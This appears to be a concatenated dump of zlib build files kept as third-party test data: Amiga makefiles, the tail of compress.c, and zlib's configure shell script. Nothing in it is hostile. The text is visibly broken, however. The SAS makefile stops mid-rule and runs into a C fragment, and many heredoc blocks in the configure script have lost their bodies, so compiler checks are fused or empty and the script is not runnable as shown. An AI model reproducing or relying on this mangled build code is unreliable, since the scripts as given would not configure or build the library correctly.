# Amiga powerUP (TM) Makefile # makefile for libpng and SAS C V6.58/7.00 PPC compiler # Copyright (C) 1998 by Andreas R. Kleinert LIBNAME = libzip.a CC = scppc CFLAGS = NOSTKCHK NOSINT OPTIMIZE OPTGO OPTPEEP OPTINLOCAL OPTINL \ OPTLOOP OPTRDEP=8 OPTDEP=8 OPTCOMP=8 NOVER AR = ppc-amigaos-ar cr RANLIB = ppc-amigaos-ranlib LD = ppc-amigaos-ld -r LDFLAGS = -o LDLIBS = LIB:scppc.a LIB:end.o RM = delete quiet OBJS = adler32.o compress.o crc32.o gzclose.o gzlib.o gzread.o gzwrite.o \ uncompr.o deflate.o trees.o zutil.o inflate.o infback.o inftrees.o inffast.o TEST_OBJS = example.o minigzip.o all: example minigzip check: test test: all example echo hello world | minigzip | minigzip -d $(LIBNAME): $(OBJS) $(AR) $@ $(OBJS) -$(RANLIB) $@ example: example.o $(LIBNAME) $(LD) $(LDFLAGS) $@ LIB:c_ppc.o $@.o $(LIBNAME) $(LDLIBS) minigzip: minigzip.o $(LIBNAME) $(LD) $(LDFLAGS) $@ LIB:c_ppc.o $@.o $(LIBNAME) $(LDLIBS) mostlyclean: clean clean: $(RM) *.o example minigzip $(LIBNAME) foo.gz zip: zip -ul9 zlib README ChangeLog Makefile Make????.??? Makefile.?? \ descrip.mms *.[ch] tgz: cd ..; tar cfz zlib/zlib.tgz zlib/README zlib/ChangeLog zlib/Makefile \ zlib/Make????.??? zlib/Makefile.?? zlib/descrip.mms zlib/*.[ch] # DO NOT DELETE THIS LINE -- make depend depends on it.
adler32.o: zlib.h zconf.h compress.o: zlib.h zconf.h crc32.o: crc32.h zlib.h zconf.h deflate.o: deflate.h zutil.h zlib.h zconf.h example.o: zlib.h zconf.h gzclose.o: zlib.h zconf.h gzguts.h gzlib.o: zlib.h zconf.h gzguts.h gzread.o: zlib.h zconf.h gzguts.h gzwrite.o: zlib.h zconf.h gzguts.h inffast.o: zutil.h zlib.h zconf.h inftrees.h inflate.h inffast.h inflate.o: zutil.h zlib.h zconf.h inftrees.h inflate.h inffast.h infback.o: zutil.h zlib.h zconf.h inftrees.h inflate.h inffast.h inftrees.o: zutil.h zlib.h zconf.h inftrees.h minigzip.o: zlib.h zconf.h trees.o: deflate.h zutil.h zlib.h zconf.h trees.h uncompr.o: zlib.h zconf.h zutil.o: zutil.h zlib.h zconf.h ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/amiga/Makefile.sas ================================================ # SMakefile for zlib # Modified from the standard UNIX Makefile Copyright Jean-loup Gailly # Osma Ahvenlampi # Amiga, SAS/C 6.56 & Smake CC=sc CFLAGS=OPT #CFLAGS=OPT CPU=68030 #CFLAGS=DEBUG=LINE LDFLAGS=LIB z.lib SCOPTIONS=OPTSCHED OPTINLINE OPTALIAS OPTTIME OPTINLOCAL STRMERGE \ NOICONS PARMS=BOTH NOSTACKCHECK UTILLIB NOVERSION ERRORREXX \ DEF=POSTINC OBJS = adler32.o compress.o crc32.o gzclose.o gzlib.o gzread.o gzwrite.o \ uncompr.o deflate.o trees.o zutil.o inflate.o infback.o inftrees.o inffast.o TEST_OBJS = example.o minigzip.o all: SCOPTIONS example minigzip check: test test: all example echo hello world | minigzip | minigzip -d install: z.lib copy clone zlib.h zconf.h INCLUDE: copy clone z.lib LIB: z.lib: $(OBJS) oml z.lib r $(OBJS) example: example.o z.lib $(CC) $(CFLAGS) LINK TO $@ example.o $(LDFLAGS) minigzip: minigzip.o z.lib $(CC) $(CFLAGS) LINK TO $@ minigzip.o $(LDFLAGS) mostlyclean: clean clean: -delete force quiet example minigzip *.o z.lib foo.gz *.lnk SCOPTIONS SCOPTIONS: Makefile.sas copy to $@ (uLong)max ? 
max : (uInt)left; left -= stream.avail_out; } if (stream.avail_in == 0) { stream.avail_in = sourceLen > (uLong)max ? max : (uInt)sourceLen; sourceLen -= stream.avail_in; } err = deflate(&stream, sourceLen ? Z_NO_FLUSH : Z_FINISH); } while (err == Z_OK); *destLen = stream.total_out; deflateEnd(&stream); return err == Z_STREAM_END ? Z_OK : err; } /* =========================================================================== */ int ZEXPORT compress(Bytef *dest, uLongf *destLen, const Bytef *source, uLong sourceLen) { return compress2(dest, destLen, source, sourceLen, Z_DEFAULT_COMPRESSION); } /* =========================================================================== If the default memLevel or windowBits for deflateInit() is changed, then this function needs to be updated. */ uLong ZEXPORT compressBound(uLong sourceLen) { return sourceLen + (sourceLen >> 12) + (sourceLen >> 14) + (sourceLen >> 25) + 13; } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/configure ================================================ #!/bin/sh # configure script for zlib. # # Normally configure builds both a static and a shared library. # If you want to build just a static library, use: ./configure --static # # To impose specific compiler or flags or install directory, use for example: # prefix=$HOME CC=cc CFLAGS="-O4" ./configure # or for csh/tcsh users: # (setenv prefix $HOME; setenv CC cc; setenv CFLAGS "-O4"; ./configure) # Incorrect settings of CC or CFLAGS may prevent creating a shared library. # If you have problems, try without defining CC and CFLAGS before reporting # an error. # start off configure.log echo -------------------- >> configure.log echo $0 $* >> configure.log date >> configure.log # get source directory SRCDIR=`dirname $0` if test $SRCDIR = "."; then ZINC="" ZINCOUT="-I." SRCDIR="" else ZINC='-include zconf.h' ZINCOUT='-I. 
-I$(SRCDIR)' SRCDIR="$SRCDIR/" fi # set command prefix for cross-compilation if [ -n "${CHOST}" ]; then uname=${CHOST} mname=${CHOST} CROSS_PREFIX="${CHOST}-" else mname=`(uname -a || echo unknown) 2>/dev/null` fi # destination name for static library STATICLIB=libz.a # extract zlib version numbers from zlib.h VER=`sed -n -e '/VERSION "/s/.*"\(.*\)".*/\1/p' < ${SRCDIR}zlib.h` VER1=`sed -n -e '/VERSION "/s/.*"\([0-9]*\)\\..*/\1/p' < ${SRCDIR}zlib.h` # establish commands for library building if "${CROSS_PREFIX}ar" --version >/dev/null 2>/dev/null || test $? -lt 126; then AR=${AR-"${CROSS_PREFIX}ar"} test -n "${CROSS_PREFIX}" && echo Using ${AR} | tee -a configure.log else AR=${AR-"ar"} test -n "${CROSS_PREFIX}" && echo Using ${AR} | tee -a configure.log fi ARFLAGS=${ARFLAGS-"rc"} if "${CROSS_PREFIX}ranlib" --version >/dev/null 2>/dev/null || test $? -lt 126; then RANLIB=${RANLIB-"${CROSS_PREFIX}ranlib"} test -n "${CROSS_PREFIX}" && echo Using ${RANLIB} | tee -a configure.log else RANLIB=${RANLIB-"ranlib"} fi if "${CROSS_PREFIX}nm" --version >/dev/null 2>/dev/null || test $? -lt 126; then NM=${NM-"${CROSS_PREFIX}nm"} test -n "${CROSS_PREFIX}" && echo Using ${NM} | tee -a configure.log else NM=${NM-"nm"} fi # set defaults before processing command line options LDCONFIG=${LDCONFIG-"ldconfig"} LDSHAREDLIBC="${LDSHAREDLIBC--lc}" ARCHS= prefix=${prefix-/usr/local} exec_prefix=${exec_prefix-'${prefix}'} libdir=${libdir-'${exec_prefix}/lib'} sharedlibdir=${sharedlibdir-'${libdir}'} includedir=${includedir-'${prefix}/include'} mandir=${mandir-'${prefix}/share/man'} shared_ext='.so' shared=1 solo=0 cover=0 zprefix=0 zconst=0 build64=0 gcc=0 warn=0 debug=0 address=0 memory=0 old_cc="$CC" old_cflags="$CFLAGS" OBJC='$(OBJZ) $(OBJG)' PIC_OBJC='$(PIC_OBJZ) $(PIC_OBJG)' # leave this script, optionally in a bad way leave() { if test "$*" != "0"; then echo "** $0 aborting." 
| tee -a configure.log fi rm -rf $test.[co] $test $test$shared_ext $test.gcno $test.dSYM ./--version echo -------------------- >> configure.log echo >> configure.log echo >> configure.log exit $1 } # process command line options while test $# -ge 1 do case "$1" in -h* | --help) echo 'usage:' | tee -a configure.log echo ' configure [--const] [--zprefix] [--prefix=PREFIX] [--eprefix=EXPREFIX]' | tee -a configure.log echo ' [--static] [--64] [--libdir=LIBDIR] [--sharedlibdir=LIBDIR]' | tee -a configure.log echo ' [--includedir=INCLUDEDIR] [--archs="-arch i386 -arch x86_64"]' | tee -a configure.log exit 0 ;; -p*=* | --prefix=*) prefix=`echo $1 | sed 's/.*=//'`; shift ;; -e*=* | --eprefix=*) exec_prefix=`echo $1 | sed 's/.*=//'`; shift ;; -l*=* | --libdir=*) libdir=`echo $1 | sed 's/.*=//'`; shift ;; --sharedlibdir=*) sharedlibdir=`echo $1 | sed 's/.*=//'`; shift ;; -i*=* | --includedir=*) includedir=`echo $1 | sed 's/.*=//'`;shift ;; -u*=* | --uname=*) uname=`echo $1 | sed 's/.*=//'`;shift ;; -p* | --prefix) prefix="$2"; shift; shift ;; -e* | --eprefix) exec_prefix="$2"; shift; shift ;; -l* | --libdir) libdir="$2"; shift; shift ;; -i* | --includedir) includedir="$2"; shift; shift ;; -s* | --shared | --enable-shared) shared=1; shift ;; -t | --static) shared=0; shift ;; --solo) solo=1; shift ;; --cover) cover=1; shift ;; -z* | --zprefix) zprefix=1; shift ;; -6* | --64) build64=1; shift ;; -a*=* | --archs=*) ARCHS=`echo $1 | sed 's/.*=//'`; shift ;; --sysconfdir=*) echo "ignored option: --sysconfdir" | tee -a configure.log; shift ;; --localstatedir=*) echo "ignored option: --localstatedir" | tee -a configure.log; shift ;; -c* | --const) zconst=1; shift ;; -w* | --warn) warn=1; shift ;; -d* | --debug) debug=1; shift ;; --sanitize) address=1; shift ;; --address) address=1; shift ;; --memory) memory=1; shift ;; *) echo "unknown option: $1" | tee -a configure.log echo "$0 --help for help" | tee -a configure.log leave 1;; esac done # temporary file name test=ztest$$ # put 
arguments in log, also put test file in log if used in arguments show() { case "$*" in *$test.c*) echo === $test.c === >> configure.log cat $test.c >> configure.log echo === >> configure.log;; esac echo $* >> configure.log } # check for gcc vs. cc and set compile and link flags based on the system identified by uname cat > $test.c </dev/null 2>&1; then cc=${CROSS_PREFIX}gcc else cc=${CROSS_PREFIX}cc fi else cc=${CC} fi case "$cc" in *gcc*) gcc=1 ;; *clang*) gcc=1 ;; esac case `$cc -v 2>&1` in *gcc*) gcc=1 ;; *clang*) gcc=1 ;; esac show $cc -c $test.c if test "$gcc" -eq 1 && ($cc -c $test.c) >> configure.log 2>&1; then echo ... using gcc >> configure.log CC="$cc" CFLAGS="${CFLAGS--O3}" SFLAGS="${CFLAGS--O3} -fPIC" if test "$ARCHS"; then CFLAGS="${CFLAGS} ${ARCHS}" LDFLAGS="${LDFLAGS} ${ARCHS}" fi if test $build64 -eq 1; then CFLAGS="${CFLAGS} -m64" SFLAGS="${SFLAGS} -m64" fi if test "$warn" -eq 1; then if test "$zconst" -eq 1; then CFLAGS="${CFLAGS} -Wall -Wextra -Wcast-qual -DZLIB_CONST" else CFLAGS="${CFLAGS} -Wall -Wextra" fi fi if test $address -eq 1; then CFLAGS="${CFLAGS} -g -fsanitize=address -fno-omit-frame-pointer" fi if test $memory -eq 1; then CFLAGS="${CFLAGS} -g -fsanitize=memory -fno-omit-frame-pointer" fi if test $debug -eq 1; then CFLAGS="${CFLAGS} -DZLIB_DEBUG" SFLAGS="${SFLAGS} -DZLIB_DEBUG" fi if test -z "$uname"; then uname=`(uname -s || echo unknown) 2>/dev/null` fi case "$uname" in Linux* | linux* | *-linux* | GNU | GNU/* | solaris*) case "$mname" in *sparc*) LDFLAGS="${LDFLAGS} -Wl,--no-warn-rwx-segments" ;; esac LDSHARED=${LDSHARED-"$cc -shared -Wl,-soname,libz.so.1,--version-script,${SRCDIR}zlib.map"} ;; *BSD | *bsd* | DragonFly) LDSHARED=${LDSHARED-"$cc -shared -Wl,-soname,libz.so.1,--version-script,${SRCDIR}zlib.map"} LDCONFIG="ldconfig -m" ;; CYGWIN* | Cygwin* | cygwin* | *-cygwin* | OS/2*) EXE='.exe' ;; MINGW* | mingw* | *-mingw*) rm -f $test.[co] $test $test$shared_ext echo "If this doesn't work for you, try win32/Makefile.gcc." 
| tee -a configure.log LDSHARED=${LDSHARED-"$cc -shared"} LDSHAREDLIBC="" EXE='.exe' ;; QNX*) # This is for QNX6. I suppose that the QNX rule below is for QNX2,QNX4 # (alain.bonnefoy@icbt.com) LDSHARED=${LDSHARED-"$cc -shared -Wl,-hlibz.so.1"} ;; HP-UX*) LDSHARED=${LDSHARED-"$cc -shared $SFLAGS"} case `(uname -m || echo unknown) 2>/dev/null` in ia64) shared_ext='.so' SHAREDLIB='libz.so' ;; *) shared_ext='.sl' SHAREDLIB='libz.sl' ;; esac ;; AIX*) LDFLAGS="${LDFLAGS} -Wl,-brtl" ;; Darwin* | darwin* | *-darwin*) shared_ext='.dylib' SHAREDLIB=libz$shared_ext SHAREDLIBV=libz.$VER$shared_ext SHAREDLIBM=libz.$VER1$shared_ext LDSHARED=${LDSHARED-"$cc -dynamiclib -install_name $libdir/$SHAREDLIBM -compatibility_version $VER1 -current_version $VER"} if "${CROSS_PREFIX}libtool" -V 2>&1 | grep Apple > /dev/null; then AR="${CROSS_PREFIX}libtool" elif libtool -V 2>&1 | grep Apple > /dev/null; then AR="libtool" else AR="/usr/bin/libtool" fi ARFLAGS="-o" ;; *) LDSHARED=${LDSHARED-"$cc -shared"} ;; esac else # find system name and corresponding cc options CC=${CC-cc} gcc=0 echo ... using $CC >> configure.log if test -z "$uname"; then uname=`(uname -sr || echo unknown) 2>/dev/null` fi case "$uname" in HP-UX*) SFLAGS=${CFLAGS-"-O +z"} CFLAGS=${CFLAGS-"-O"} # LDSHARED=${LDSHARED-"ld -b +vnocompatwarnings"} LDSHARED=${LDSHARED-"ld -b"} case `(uname -m || echo unknown) 2>/dev/null` in ia64) shared_ext='.so' SHAREDLIB='libz.so' ;; *) shared_ext='.sl' SHAREDLIB='libz.sl' ;; esac ;; IRIX*) SFLAGS=${CFLAGS-"-ansi -O2 -rpath ."} CFLAGS=${CFLAGS-"-ansi -O2"} LDSHARED=${LDSHARED-"cc -shared -Wl,-soname,libz.so.1"} ;; OSF1\ V4*) SFLAGS=${CFLAGS-"-O -std1"} CFLAGS=${CFLAGS-"-O -std1"} LDFLAGS="${LDFLAGS} -Wl,-rpath,." 
LDSHARED=${LDSHARED-"cc -shared -Wl,-soname,libz.so -Wl,-msym -Wl,-rpath,$(libdir) -Wl,-set_version,${VER}:1.0"} ;; OSF1*) SFLAGS=${CFLAGS-"-O -std1"} CFLAGS=${CFLAGS-"-O -std1"} LDSHARED=${LDSHARED-"cc -shared -Wl,-soname,libz.so.1"} ;; QNX*) SFLAGS=${CFLAGS-"-4 -O"} CFLAGS=${CFLAGS-"-4 -O"} LDSHARED=${LDSHARED-"cc"} RANLIB=${RANLIB-"true"} AR="cc" ARFLAGS="-A" ;; SCO_SV\ 3.2*) SFLAGS=${CFLAGS-"-O3 -dy -KPIC "} CFLAGS=${CFLAGS-"-O3"} LDSHARED=${LDSHARED-"cc -dy -KPIC -G"} ;; SunOS\ 5* | solaris*) LDSHARED=${LDSHARED-"cc -G -h libz$shared_ext.$VER1"} SFLAGS=${CFLAGS-"-fast -KPIC"} CFLAGS=${CFLAGS-"-fast"} if test $build64 -eq 1; then # old versions of SunPRO/Workshop/Studio don't support -m64, # but newer ones do. Check for it. flag64=`$CC -flags | egrep -- '^-m64'` if test x"$flag64" != x"" ; then CFLAGS="${CFLAGS} -m64" SFLAGS="${SFLAGS} -m64" else case `(uname -m || echo unknown) 2>/dev/null` in i86*) SFLAGS="$SFLAGS -xarch=amd64" CFLAGS="$CFLAGS -xarch=amd64" ;; *) SFLAGS="$SFLAGS -xarch=v9" CFLAGS="$CFLAGS -xarch=v9" ;; esac fi fi if test -n "$ZINC"; then ZINC='-I- -I. 
-I$(SRCDIR)' fi ;; SunOS\ 4*) SFLAGS=${CFLAGS-"-O2 -PIC"} CFLAGS=${CFLAGS-"-O2"} LDSHARED=${LDSHARED-"ld"} ;; SunStudio\ 9*) SFLAGS=${CFLAGS-"-fast -xcode=pic32 -xtarget=ultra3 -xarch=v9b"} CFLAGS=${CFLAGS-"-fast -xtarget=ultra3 -xarch=v9b"} LDSHARED=${LDSHARED-"cc -xarch=v9b"} ;; UNIX_System_V\ 4.2.0) SFLAGS=${CFLAGS-"-KPIC -O"} CFLAGS=${CFLAGS-"-O"} LDSHARED=${LDSHARED-"cc -G"} ;; UNIX_SV\ 4.2MP) SFLAGS=${CFLAGS-"-Kconform_pic -O"} CFLAGS=${CFLAGS-"-O"} LDSHARED=${LDSHARED-"cc -G"} ;; OpenUNIX\ 5) SFLAGS=${CFLAGS-"-KPIC -O"} CFLAGS=${CFLAGS-"-O"} LDSHARED=${LDSHARED-"cc -G"} ;; AIX*) # Courtesy of dbakker@arrayasolutions.com SFLAGS=${CFLAGS-"-O -qmaxmem=8192"} CFLAGS=${CFLAGS-"-O -qmaxmem=8192"} LDSHARED=${LDSHARED-"xlc -G"} ;; # send working options for other systems to zlib@gzip.org *) SFLAGS=${CFLAGS-"-O"} CFLAGS=${CFLAGS-"-O"} LDSHARED=${LDSHARED-"cc -shared"} ;; esac fi # destination names for shared library if not defined above SHAREDLIB=${SHAREDLIB-"libz$shared_ext"} SHAREDLIBV=${SHAREDLIBV-"libz$shared_ext.$VER"} SHAREDLIBM=${SHAREDLIBM-"libz$shared_ext.$VER1"} echo >> configure.log # define functions for testing compiler and library characteristics and logging the results cat > $test.c </dev/null; then try() { show $* test "`( $* ) 2>&1 | tee -a configure.log`" = "" } echo - using any output from compiler to indicate an error >> configure.log else try() { show $* got=`( $* ) 2>&1` ret=$? if test "$got" != ""; then printf "%s\n" "$got" >> configure.log fi if test $ret -ne 0; then echo "(exit code "$ret")" >> configure.log fi return $ret } fi tryboth() { show $* got=`( $* ) 2>&1` ret=$? if test "$got" != ""; then printf "%s\n" "$got" >> configure.log fi if test $ret -ne 0; then echo "(exit code "$ret")" >> configure.log return $ret fi test "$got" = "" } cat > $test.c << EOF int foo() { return 0; } EOF echo "Checking for obsessive-compulsive compiler options..." 
>> configure.log if try $CC -c $CFLAGS $test.c; then : else echo "Compiler error reporting is too harsh for $0 (perhaps remove -Werror)." | tee -a configure.log leave 1 fi echo >> configure.log # see if shared library build supported cat > $test.c <> configure.log # check for size_t cat > $test.c < #include size_t dummy = 0; EOF if try $CC -c $CFLAGS $test.c; then echo "Checking for size_t... Yes." | tee -a configure.log else echo "Checking for size_t... No." | tee -a configure.log # find a size_t integer type # check for long long cat > $test.c << EOF long long dummy = 0; EOF if try $CC -c $CFLAGS $test.c; then echo "Checking for long long... Yes." | tee -a configure.log cat > $test.c < int main(void) { if (sizeof(void *) <= sizeof(int)) puts("int"); else if (sizeof(void *) <= sizeof(long)) puts("long"); else puts("z_longlong"); return 0; } EOF else echo "Checking for long long... No." | tee -a configure.log cat > $test.c < int main(void) { if (sizeof(void *) <= sizeof(int)) puts("int"); else puts("long"); return 0; } EOF fi if try $CC $CFLAGS -o $test $test.c; then sizet=`./$test` echo "Checking for a pointer-size integer type..." $sizet"." | tee -a configure.log CFLAGS="${CFLAGS} -DNO_SIZE_T=${sizet}" SFLAGS="${SFLAGS} -DNO_SIZE_T=${sizet}" else echo "Checking for a pointer-size integer type... not found." | tee -a configure.log fi fi echo >> configure.log # check for large file support, and if none, check for fseeko() cat > $test.c < off64_t dummy = 0; EOF if try $CC -c $CFLAGS -D_LARGEFILE64_SOURCE=1 $test.c; then CFLAGS="${CFLAGS} -D_LARGEFILE64_SOURCE=1" SFLAGS="${SFLAGS} -D_LARGEFILE64_SOURCE=1" ALL="${ALL} all64" TEST="${TEST} test64" echo "Checking for off64_t... Yes." | tee -a configure.log echo "Checking for fseeko... Yes." | tee -a configure.log else echo "Checking for off64_t... No." 
| tee -a configure.log echo >> configure.log cat > $test.c < int main(void) { fseeko(NULL, 0, 0); return 0; } EOF if try $CC $CFLAGS -o $test $test.c; then echo "Checking for fseeko... Yes." | tee -a configure.log else CFLAGS="${CFLAGS} -DNO_FSEEKO" SFLAGS="${SFLAGS} -DNO_FSEEKO" echo "Checking for fseeko... No." | tee -a configure.log fi fi echo >> configure.log # check for strerror() for use by gz* functions cat > $test.c < #include int main() { return strlen(strerror(errno)); } EOF if try $CC $CFLAGS -o $test $test.c; then echo "Checking for strerror... Yes." | tee -a configure.log else CFLAGS="${CFLAGS} -DNO_STRERROR" SFLAGS="${SFLAGS} -DNO_STRERROR" echo "Checking for strerror... No." | tee -a configure.log fi # copy clean zconf.h for subsequent edits cp -p ${SRCDIR}zconf.h.in zconf.h echo >> configure.log # check for unistd.h and save result in zconf.h cat > $test.c < int main() { return 0; } EOF if try $CC -c $CFLAGS $test.c; then sed < zconf.h "/^#ifdef HAVE_UNISTD_H.* may be/s/def HAVE_UNISTD_H\(.*\) may be/ 1\1 was/" > zconf.temp.h mv zconf.temp.h zconf.h echo "Checking for unistd.h... Yes." | tee -a configure.log else echo "Checking for unistd.h... No." | tee -a configure.log fi echo >> configure.log # check for stdarg.h and save result in zconf.h cat > $test.c < int main() { return 0; } EOF if try $CC -c $CFLAGS $test.c; then sed < zconf.h "/^#ifdef HAVE_STDARG_H.* may be/s/def HAVE_STDARG_H\(.*\) may be/ 1\1 was/" > zconf.temp.h mv zconf.temp.h zconf.h echo "Checking for stdarg.h... Yes." | tee -a configure.log else echo "Checking for stdarg.h... No." | tee -a configure.log fi # if the z_ prefix was requested, save that in zconf.h if test $zprefix -eq 1; then sed < zconf.h "/#ifdef Z_PREFIX.* may be/s/def Z_PREFIX\(.*\) may be/ 1\1 was/" > zconf.temp.h mv zconf.temp.h zconf.h echo >> configure.log echo "Using z_ prefix on all symbols." 
| tee -a configure.log fi # if --solo compilation was requested, save that in zconf.h and remove gz stuff from object lists if test $solo -eq 1; then sed '/#define ZCONF_H/a\ #define Z_SOLO ' < zconf.h > zconf.temp.h mv zconf.temp.h zconf.h OBJC='$(OBJZ)' PIC_OBJC='$(PIC_OBJZ)' fi # if code coverage testing was requested, use older gcc if defined, e.g. "gcc-4.2" on Mac OS X if test $cover -eq 1; then CFLAGS="${CFLAGS} -fprofile-arcs -ftest-coverage" if test -n "$GCC_CLASSIC"; then CC=$GCC_CLASSIC fi fi echo >> configure.log # conduct a series of tests to resolve eight possible cases of using "vs" or "s" printf functions # (using stdarg or not), with or without "n" (proving size of buffer), and with or without a # return value. The most secure result is vsnprintf() with a return value. snprintf() with a # return value is secure as well, but then gzprintf() will be limited to 20 arguments. cat > $test.c < #include #include "zconf.h" int main() { #ifndef STDC choke me #endif return 0; } EOF if try $CC -c $CFLAGS $test.c; then echo "Checking whether to use vs[n]printf() or s[n]printf()... using vs[n]printf()." | tee -a configure.log echo >> configure.log cat > $test.c < #include int mytest(const char *fmt, ...) { char buf[20]; va_list ap; va_start(ap, fmt); vsnprintf(buf, sizeof(buf), fmt, ap); va_end(ap); return 0; } int main() { return (mytest("Hello%d\n", 1)); } EOF if try $CC $CFLAGS -o $test $test.c; then echo "Checking for vsnprintf() in stdio.h... Yes." | tee -a configure.log echo >> configure.log cat >$test.c < #include int mytest(const char *fmt, ...) { int n; char buf[20]; va_list ap; va_start(ap, fmt); n = vsnprintf(buf, sizeof(buf), fmt, ap); va_end(ap); return n; } int main() { return (mytest("Hello%d\n", 1)); } EOF if try $CC -c $CFLAGS $test.c; then echo "Checking for return value of vsnprintf()... Yes." 
| tee -a configure.log else CFLAGS="$CFLAGS -DHAS_vsnprintf_void" SFLAGS="$SFLAGS -DHAS_vsnprintf_void" echo "Checking for return value of vsnprintf()... No." | tee -a configure.log echo " WARNING: apparently vsnprintf() does not return a value. zlib" | tee -a configure.log echo " can build but will be open to possible string-format security" | tee -a configure.log echo " vulnerabilities." | tee -a configure.log fi else CFLAGS="$CFLAGS -DNO_vsnprintf" SFLAGS="$SFLAGS -DNO_vsnprintf" echo "Checking for vsnprintf() in stdio.h... No." | tee -a configure.log echo " WARNING: vsnprintf() not found, falling back to vsprintf(). zlib" | tee -a configure.log echo " can build but will be open to possible buffer-overflow security" | tee -a configure.log echo " vulnerabilities." | tee -a configure.log echo >> configure.log cat >$test.c < #include int mytest(const char *fmt, ...) { int n; char buf[20]; va_list ap; va_start(ap, fmt); n = vsprintf(buf, fmt, ap); va_end(ap); return n; } int main() { return (mytest("Hello%d\n", 1)); } EOF if try $CC -c $CFLAGS $test.c; then echo "Checking for return value of vsprintf()... Yes." | tee -a configure.log else CFLAGS="$CFLAGS -DHAS_vsprintf_void" SFLAGS="$SFLAGS -DHAS_vsprintf_void" echo "Checking for return value of vsprintf()... No." | tee -a configure.log echo " WARNING: apparently vsprintf() does not return a value. zlib" | tee -a configure.log echo " can build but will be open to possible string-format security" | tee -a configure.log echo " vulnerabilities." | tee -a configure.log fi fi else echo "Checking whether to use vs[n]printf() or s[n]printf()... using s[n]printf()." | tee -a configure.log echo >> configure.log cat >$test.c < int mytest() { char buf[20]; snprintf(buf, sizeof(buf), "%s", "foo"); return 0; } int main() { return (mytest()); } EOF if try $CC $CFLAGS -o $test $test.c; then echo "Checking for snprintf() in stdio.h... Yes." 
| tee -a configure.log echo >> configure.log cat >$test.c < int mytest() { char buf[20]; return snprintf(buf, sizeof(buf), "%s", "foo"); } int main() { return (mytest()); } EOF if try $CC -c $CFLAGS $test.c; then echo "Checking for return value of snprintf()... Yes." | tee -a configure.log else CFLAGS="$CFLAGS -DHAS_snprintf_void" SFLAGS="$SFLAGS -DHAS_snprintf_void" echo "Checking for return value of snprintf()... No." | tee -a configure.log echo " WARNING: apparently snprintf() does not return a value. zlib" | tee -a configure.log echo " can build but will be open to possible string-format security" | tee -a configure.log echo " vulnerabilities." | tee -a configure.log fi else CFLAGS="$CFLAGS -DNO_snprintf" SFLAGS="$SFLAGS -DNO_snprintf" echo "Checking for snprintf() in stdio.h... No." | tee -a configure.log echo " WARNING: snprintf() not found, falling back to sprintf(). zlib" | tee -a configure.log echo " can build but will be open to possible buffer-overflow security" | tee -a configure.log echo " vulnerabilities." | tee -a configure.log echo >> configure.log cat >$test.c < int mytest() { char buf[20]; return sprintf(buf, "%s", "foo"); } int main() { return (mytest()); } EOF if try $CC -c $CFLAGS $test.c; then echo "Checking for return value of sprintf()... Yes." | tee -a configure.log else CFLAGS="$CFLAGS -DHAS_sprintf_void" SFLAGS="$SFLAGS -DHAS_sprintf_void" echo "Checking for return value of sprintf()... No." | tee -a configure.log echo " WARNING: apparently sprintf() does not return a value. zlib" | tee -a configure.log echo " can build but will be open to possible string-format security" | tee -a configure.log echo " vulnerabilities." 
| tee -a configure.log fi fi fi # see if we can hide zlib internal symbols that are linked between separate source files if test "$gcc" -eq 1; then echo >> configure.log cat > $test.c <> configure.log echo ALL = $ALL >> configure.log echo AR = $AR >> configure.log echo ARFLAGS = $ARFLAGS >> configure.log echo CC = $CC >> configure.log echo CFLAGS = $CFLAGS >> configure.log echo CPP = $CPP >> configure.log echo EXE = $EXE >> configure.log echo LDCONFIG = $LDCONFIG >> configure.log echo LDFLAGS = $LDFLAGS >> configure.log echo LDSHARED = $LDSHARED >> configure.log echo LDSHAREDLIBC = $LDSHAREDLIBC >> configure.log echo OBJC = $OBJC >> configure.log echo PIC_OBJC = $PIC_OBJC >> configure.log echo RANLIB = $RANLIB >> configure.log echo SFLAGS = $SFLAGS >> configure.log echo SHAREDLIB = $SHAREDLIB >> configure.log echo SHAREDLIBM = $SHAREDLIBM >> configure.log echo SHAREDLIBV = $SHAREDLIBV >> configure.log echo STATICLIB = $STATICLIB >> configure.log echo TEST = $TEST >> configure.log echo VER = $VER >> configure.log echo SRCDIR = $SRCDIR >> configure.log echo exec_prefix = $exec_prefix >> configure.log echo includedir = $includedir >> configure.log echo libdir = $libdir >> configure.log echo mandir = $mandir >> configure.log echo prefix = $prefix >> configure.log echo sharedlibdir = $sharedlibdir >> configure.log echo uname = $uname >> configure.log # update Makefile with the configure results sed < ${SRCDIR}Makefile.in " /^CC *=/s#=.*#=$CC# /^CFLAGS *=/s#=.*#=$CFLAGS# /^SFLAGS *=/s#=.*#=$SFLAGS# /^LDFLAGS *=/s#=.*#=$LDFLAGS# /^LDSHARED *=/s#=.*#=$LDSHARED# /^CPP *=/s#=.*#=$CPP# /^STATICLIB *=/s#=.*#=$STATICLIB# /^SHAREDLIB *=/s#=.*#=$SHAREDLIB# /^SHAREDLIBV *=/s#=.*#=$SHAREDLIBV# /^SHAREDLIBM *=/s#=.*#=$SHAREDLIBM# /^AR *=/s#=.*#=$AR# /^ARFLAGS *=/s#=.*#=$ARFLAGS# /^RANLIB *=/s#=.*#=$RANLIB# /^LDCONFIG *=/s#=.*#=$LDCONFIG# /^LDSHAREDLIBC *=/s#=.*#=$LDSHAREDLIBC# /^EXE *=/s#=.*#=$EXE# /^SRCDIR *=/s#=.*#=$SRCDIR# /^ZINC *=/s#=.*#=$ZINC# /^ZINCOUT *=/s#=.*#=$ZINCOUT# 
